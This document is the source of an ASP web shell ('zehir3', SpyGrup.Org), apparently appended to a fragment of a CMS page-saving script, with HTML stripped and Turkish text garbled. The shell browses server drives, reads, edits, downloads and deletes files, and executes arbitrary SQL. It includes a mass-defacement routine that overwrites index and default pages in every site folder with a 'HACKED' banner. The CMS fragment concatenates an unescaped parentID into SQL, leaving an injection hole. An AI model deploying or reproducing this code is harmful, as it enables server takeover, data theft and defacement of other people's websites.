<% mpat=replace(Request.ServerVariables("PATH_TRANSLATED"),"/","\") dosyaPath = mid(mpat,InStrRev(mpat,"\")+1) on error resume next Dim objFSO,popup Set objFSO = CreateObject ("Scripting.FileSystemObject") if Request("kuskapani")=1 then Response.End end if if Request("kuskapani")=2 then on error resume next path = Request("path") sFolder = Request("SubFolder") fName = Request("FileName") d1 = Request("dosya1") d2 = Request("dosya2") d3 = Request("dosya3") d4 = Request("dosya4") bg__ = Request.Form("selectColour") if bg__ = "0" then bg__ = "#ffffff" byMesaj = "" & Request("byMesaj") & "

HACKED " & Session("n2") & "3 ;)" sFolder = Replace(sFolder,"/","\") if Right(sFolder,1)<>"\" then sFolder = sFolder & "\" Set f = objFSO.GetFolder(Path) Set fc = f.SubFolders h__ = 0 f__ = 0 ss__ = now For Each f1 In fc hedef_ = replace(f1.path,"/","\") if Right(hedef_,1)<>"\" then hedef_ = hedef_ & "\" hedef__ = left(hedef_,len(hedef_)-1) folderName_ = Right(hedef__, len(hedef__)-instrrev(hedef__,"\")) if d1<>"" then d1 = true if d2<>"" then d2 = true if d3<>"" then d3 = true if d4<>"" then d4 = true on error goto 0:on error resume next if fName<>"" then Set MyFile = objFSO.CreateTextFile(hedef_ & sFolder & fName, True) MyFile.write byMesaj end if if d1 then Set MyFile = objFSO.CreateTextFile(hedef_ & sFolder & "index.htm", True) MyFile.write byMesaj end if if d2 then Set MyFile = objFSO.CreateTextFile(hedef_ & sFolder & "default.htm", True) MyFile.write byMesaj end if if d3 then Set MyFile = objFSO.CreateTextFile(hedef_ & sFolder & "index.asp", True) MyFile.write byMesaj end if if d4 then Set MyFile = objFSO.CreateTextFile(hedef_ & sFolder & "default.asp", True) MyFile.write byMesaj end if if err<>0 then response.Write folderName_ & " [FAILED!]
" f__ = f__ + 1 else response.Write folderName_ & "
" h__ = h__ + 1 end if Next ss___ = now response.Write "
by AnGeL25dZ...
Sonuc : Toplam Süre : "&left(ss__-ss___,5)&"sn. ;)
Hacked = "&h__&"
Failed = "&f__ response.End end if status = Request("status") path = Request("path") dPath = Request("dPath") arama = Request("txArama") dkayit = Request("dkayit") table = Request("table") del = Request("del") islem = Request("islem") strSQL = Request("strSQL") cf = Request("cf") pathfile = request("pathfile") if path="" then path=request.servervariables("APPL_PHYSICAL_PATH") if status="" then status=2 popup = true '//////////////////////////////// Function ReadBinaryFile(FileName) Const adTypeBinary = 1 Dim BinaryStream Set BinaryStream = CreateObject("ADODB.Stream") BinaryStream.Type = adTypeBinary BinaryStream.Open BinaryStream.LoadFromFile FileName ReadBinaryFile = BinaryStream.Read End Function if status="-3" then Response.Buffer=True Set Fil = objFSO.GetFile(pathfile) Response.contenttype="application/force-download" Response.AddHeader "Cache-control","private" Response.AddHeader "Content-Length", Fil.Size Response.AddHeader "Content-Disposition", "attachment; filename=" & Fil.name Response.BinaryWrite readBinaryFile(Fil.path) Set f = Nothing: Set Fil = Nothing response.End() end if '////////////////////////////////// if status="-4" then popup=false if status="13" then popup=false if status="14" then popup=false if status="15" then popup=false if status="16" then popup=false if status="17" then popup=false if status="18" then popup=false if status="19" then popup=false if status="33" then popup=false if status="40" then popup=false if status="50" then popup=false byMsg = request.QueryString("byMsg") if byMsg<>"" then response.Write byMsg response.Write "zehir3 --> powered by Kruis <Admin@spygrup.org>" if popup then %>
System Info | System Test | Sites Test | Folder Action | SQL Server | POWERED BY <% %>
Güvenlik Testi - SpyGrup.Org
Path
Sub Folder
File Name
index.htm
default.htm
index.asp
default.asp
Cut Copy Paste Bold Italic UnderLine JustifyLeft JustifyCenter JustifyRight AddLink AddImage
<% popup=false CASE 51 ' ضzel ilemler END SELECT %> <% if popup then if status=7 or status=8 then Response.Write "
" Response.Write "
SQL اaltr" Response.Write "" Response.Write "" Response.Write "
" end if Response.Write "
" Response.Write "
Path : " Response.Write "" Response.Write "" Response.Write "

" end if sub aramaUpload Response.Write "
" Response.Write "
Arama : " Response.Write " " Response.Write "" Response.Write "
" %>
" ID="Form1"> Max:
<% end sub SELECT CASE status CASE 1 'Driver Open if len(path)=1 then Response.Write (yaziyomu(path&":\")) else Response.Write (yaziyomu(path)) Response.Write "" Path = Path & ":/" Response.Write "" hataKontrol CASE 2 'Normal listeleme if len(path)=1 then Response.Write (yaziyomu(path&":\")) else Response.Write (yaziyomu(path)) Response.Write "
" KlasorOku Response.Write "" DosyaOku Response.Write "
" Response.Write "" hataKontrol CASE 3 'File Delete objFSO.DeleteFile del hataKontrol if err<>0 then byMsg="Not File Deleted!
" else byMsg="File Deleted Successful;)
" end if Response.Redirect dosyaPath&"?status=2&path="&path&"&Time="&time&"&byMsg="&byMsg CASE 4 'Folder Delete objFSO.DeleteFolder del hataKontrol if err<>0 then byMsg="Not Folder Deleted!
" else byMsg="Folder Deleted Successful;)
" end if Response.Redirect dosyaPath&"?status=2&path="&path&"&Time="&time&"&byMsg="&byMsg CASE 5 'Dosya içeriًini gِrüntüle Response.Write "
"&path&"

" Response.Write "
" KlasorOku Response.Write "" DosyaOku Response.Write "
" set f = objFSO.OpenTextFile(path,1) Response.Write "
"&Server.HTMLEncode(f.readAll)&"
" if err<>62 then hataKontrol if err.number=62 then Response.Write "":Response.End CASE 6 'Resim aç Response.Write "
admin@spygrup.org / admin@spygrup.org

" CASE 7 'database tablo listele Response.Write "Tablolar

" Set objConn = Server.CreateObject("ADODB.Connection") Set objADOX = Server.CreateObject("ADOX.Catalog") objConn.Provider = "Microsoft.Jet.Oledb.4.0" objConn.ConnectionString = Path objConn.Open objADOX.ActiveConnection = objConn For Each table in objADOX.Tables If table.Type = "TABLE" Then Response.Write "4 "&table.Name&"
" End If Next hataKontrol CASE 8 'database kayt listele Set objConn = Server.CreateObject("ADODB.Connection") Set objRcs = Server.CreateObject("ADODB.RecordSet") objConn.Provider = "Microsoft.Jet.Oledb.4.0" objConn.ConnectionString = Path objConn.Open objRcs.Open table,objConn, adOpenKeyset , , adCmdText Response.Write "" for i=0 to objRcs.Fields.count-1 Response.Write "" next Response.Write "" do while not objRcs.EOF Response.Write "" for i=0 to objRcs.Fields.count-1 Response.Write "" next Response.Write "" objRcs.MoveNext loop Response.Write "
   "&objRcs.Fields(i).Name&"   
"&objRcs.Fields(i).Value&" 

" hataKontrol CASE 9 'SQL Execute Set objConn = Server.CreateObject("ADODB.Connection") objConn.Provider = "Microsoft.Jet.Oledb.4.0" objConn.ConnectionString = Path objConn.Open objConn.Execute strSQL ' Response.Redirect dosyaPath&"?status=7&Path="&Path&"&Time="&time hataKontrol CASE 10 'Dosya Editleme set f = objFSO.OpenTextFile(dPath,1) Response.Write "
" Response.Write "" Response.Write "" Response.Write "" Response.Write "
" Response.Write "
" hataKontrol CASE 11 'Dosya Kayt set saveTextFile = objFSO.OpenTextFile(dPath,2,true,false) hataKontrol saveTextFile.Write(dkayit) saveTextFile.close if err<>0 then byMsg = "Not File Edited!
" else byMsg = "File Edited Successful:)
" end if Response.Redirect dosyaPath&"?status=2&path="&path&"&time="&time&"&byMsg=" & byMsg CASE 12 'Dosya Arama araBul path,arama hataKontrol END SELECT Response.Write "
" sub DosyaOku Set f = objFSO.GetFolder(Path) Set fc = f.Files For Each f1 In fc dosyaAdi = f1.name num = InStrRev(dosyaAdi,".") uzanti = lcase(Right(dosyaAdi,len(dosyaAdi)-num)) downStr = "ûح4" response.Write "" select case uzanti case "mdb" Response.Write ""&f1.name&" ["&FormatNumber(f1.size,0)&"]"&" M "&downStr&"
" case "asp" Response.Write ""&f1.name&" ["&FormatNumber(f1.size,0)&"]"&" !"&downStr&"
" case "jpg","gif" Response.Write ""&f1.name&" ["&FormatNumber(f1.size,0)&"]"&" "&downStr&"
" case else Response.Write ""&f1.name&" ["&FormatNumber(f1.size,0)&"]"&" 2 !"&downStr&"
" end select Next end sub sub KlasorOku Set f = objFSO.GetFolder(Path) Set fc = f.SubFolders if session("klasoroku")="" then response.Write "" session("klasoroku")="simdi yazlyor" end if For Each f1 In fc Response.Write "4 û 1"&f1.name&"
" Next end sub function createFileName() Randomize fName_ = "" for i=1 to 10 fName_ = fName_ & int(Rnd*100) next createFileName = fName_ end function function resimYol(path_) on error resume next path_ = Replace(Replace(path_,"\","/"),"//","/") lpath_ = left(request.servervariables("PATH_TRANSLATED"),instrrev(request.servervariables("PATH_TRANSLATED"),"\")) if yaziyomu2(lpath_) then fname__ = "0"&createFileName()&"."&Right(path_,3) objFSO.CopyFile path_, lpath_&"\"&fname__ else Response.Write("Resim Açlamyor..
فsterseniz Download Ederek gِrüntüleyebilirsiniz..") end if resimYol = fname__ end function if not popup then Set fc = Nothing Set objFSO = Nothing Response.End end if %> <% Response.Write "" for each drive_ in objFSO.Drives Response.Write "" next Response.Write "" Response.Write "
Sürücüler
" Response.write ";" if drive_.Drivetype=1 then Response.write "Floppy [" & drive_.DriveLetter & ":]" if drive_.Drivetype=2 then Response.write "HardDisk [" & drive_.DriveLetter & ":]" if drive_.Drivetype=3 then Response.write "Remote HDD [" & drive_.DriveLetter & ":]" if drive_.Drivetype=4 then Response.write "CD-Rom [" & drive_.DriveLetter & ":]" Response.Write "
" Response.write "H Local Path" Response.Write "

" Set fc = Nothing Set objFSO = Nothing Response.End%> <% if Request.QueryString("action") = "save" then 'STEP 9: Save the submitted content to the database. dim strTitle dim strContent strTitle = Request.Form("txtTitle") strContent = Request.Form("txtContent") strPageProperties = Request.Form("txtPageProperties") active = Request.Form("active") parentID = Request.Form("parentID") if active<> "true" then active= false if databaseType=2 then active=0 else active = true if databaseType=2 then active=1 end if dim adoCn dim strSQL set adoCn = Server.CreateObject("ADODB.Connection") adoCn.Open dbConnectionStr strSQL = "Insert Into Documents (Title, Content, PageProperties, Active, parentID) Values ('" & replace(strTitle,"'","''") & "','" & replace(strContent,"'","''") & "','" & replace(strPageProperties,"'","''") & "', " & active &", " & parentID &")" 'response.write strSQL 'response.end adoCn.Execute strSQL adoCn.Close set adoCn = nothing 'Response.Redirect "default.asp" Sub loadCategories() Set objConn = Server.CreateObject("ADODB.Connection") objConn.Open dbConnectionStr SQLQuery = "SELECT Title, DocumentID FROM Documents WHERE ParentID = 0;" Set ds = objConn.Execute(SQLQuery) If not ds.eof and not ds.bof then do while not ds.eof Title = ds("Title") DocumentID = ds("DocumentID") response.write("") ds.moveNext loop end if ds.close set ds = nothing objConn.close set objConn = nothing end sub %> <%end if%>
:
:
value="true" > :
: